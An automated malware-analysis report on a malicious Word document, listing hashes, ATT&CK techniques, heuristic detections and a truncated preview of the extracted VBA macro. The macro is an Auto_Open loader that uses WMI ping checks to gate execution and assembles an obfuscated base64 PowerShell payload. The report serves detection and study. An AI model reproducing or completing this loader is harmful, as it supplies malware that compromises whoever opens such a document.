Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a04faa1303fb9e2e…

MALICIOUS

Office (OLE)

328.0 KB Created: 2018-03-12 20:00:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: f64f3900ec8abe9d6b12438ef9e49520 SHA-1: 82b962d55f305a1cea942d43f36f6ed1776a6145 SHA-256: a04faa1303fb9e2ecced0849e7bf0becff9d70f0b9dcfa80faac34b766b9a390
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros with an Auto_Open subroutine, which is a common technique for executing malicious code upon document opening. The critical heuristic firing for Shell() call in VBA indicates the macro attempts to execute external commands. The script also uses GetObject to interact with WMI, potentially to check network connectivity or gather system information before proceeding with payload execution.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://help.github.com/articles/github-terms-of-service/ In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 127107 bytes
SHA-256: aab0e3213b97ab9a1d77284e8451846794b6086bef88f44291a8157c6b9d47ad
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
On Error Resume Next
    Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True")
    With objPing
        Debug.Print "Status Code: " & .StatusCode
        If .StatusCode = 0 Then
            nt1 = False
        ElseIf .StatusCode > 0 Then
            nt1 = False
        Else 'No DNS Resolution
            nt1 = True
        End If
    End With
    
    Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='" & Environ$("userdomain") & "',ResolveAddressNames=True")
    With objPing
        Debug.Print "Status Code: " & .StatusCode
        Debug.Print "Address: " & .Address
        If .StatusCode = 0 Then
            nt2 = True
        ElseIf .StatusCode > 0 Then
            nt2 = False
        Else 'No DNS Resolution
            nt2 = False
        End If
    End With
    
    If nt1 = True And nt2 = True Then
        Dim UnstorableNonglazed As String
        PettlingUrnflower = Array("u", "c", "b", "w", "d", "x", "h", "o", "-", "a", "p", "n", " ", "i", "l", "t", "s", "r", "y", "e")
        Dim ReconfirmDiplasion As String
        ReconfirmDiplasion = "SQBmACgAJABQ"
    
        Dim ApplianceAxles As String
        ApplianceAxles = "AFMAVgBlAHIAcwBJAE8A"
    
    
        Dim SiphonocladalesFinches As String
        SiphonocladalesFinches = "bgBUAGEAYgBMAGUALgBQA"
        Dim UnformulisticGalantine As String
        UnformulisticGalantine = "FMAVgBlAFI"
    
        Dim HeliophobiaPullalue As String
        HeliophobiaPullalue = "AUwBpAE8AT"
        StunsHypercorrectness = StunsHypercorrectness & ReconfirmDiplasion & ApplianceAxles & SiphonocladalesFinches & UnformulisticGalantine & HeliophobiaPullalue
        Dim CatapanOophytic As String
        CatapanOophytic = "gAuAE0AQQBKAE"
        Dim ShoplandIncendious As String
        ShoplandIncendious = "8AUgAgAC"
        Dim ErdCrofterization As String
        ErdCrofterization = "0ARwBFACAAMwApA"
        Dim SuperabstractlyVolpane As String
        SuperabstractlyVolpane = "HsAJABHAFAARg"
    
        Dim RulinglyDeputator As String
        RulinglyDeputator = "A9AFsAcgBlAGY"
        StunsHypercorrectness = StunsHypercorrectness & CatapanOophytic & ShoplandIncendious & ErdCrofterization & SuperabstractlyVolpane & RulinglyDeputator
        Dim TwiselBenamed As String
        TwiselBenamed = "AXQAuAEEAUwBzAGUAT"
        UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(10)
        UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(7)
        Dim RoughshodAdrip As String
        RoughshodAdrip = "QBiAEwAWQAu"
    
        Dim AlgeticWoodenly As String
        AlgeticWoodenly = "AEcARQB0AFQ"
    
        Dim CongealsGlistened As String
        CongealsGlistened = "AeQBQAE"
    
    
        Dim GastrologistGerfen As String
        GastrologistGerfen = "UAKAAnAFMA"
        StunsHypercorrectness = StunsHypercorrectness & TwiselBenamed & RoughshodAdrip & AlgeticWoodenly & CongealsGlistened & GastrologistGerfen
        Dim UnfurredFrankfort As String
        UnfurredFrankfort = "eQBzAHQAZQBtAC"
        Dim RetortureCorpselikeness As String
        RetortureCorpselikeness = "4ATQBhAG4"
    
    
        Dim SublistsAdvocatrice As String
        SublistsAdvocatrice = "AYQBnAGUA"
    
    
        Dim SplitRestabbing As String
        SplitRestabbing = "bQBlAG4AdAAuAEE"
    
        Dim UnkamedReferee As String
        UnkamedReferee = "AdQB0AG8AbQBhAHQA"
        StunsHypercorrectness = StunsHypercorrectness & UnfurredFrankfort & RetortureCorpselikeness & SublistsAdvocatrice & SplitRestabbing & UnkamedReferee
        Dim ContinuersAurothiosulphate As String
        Conti
... (truncated)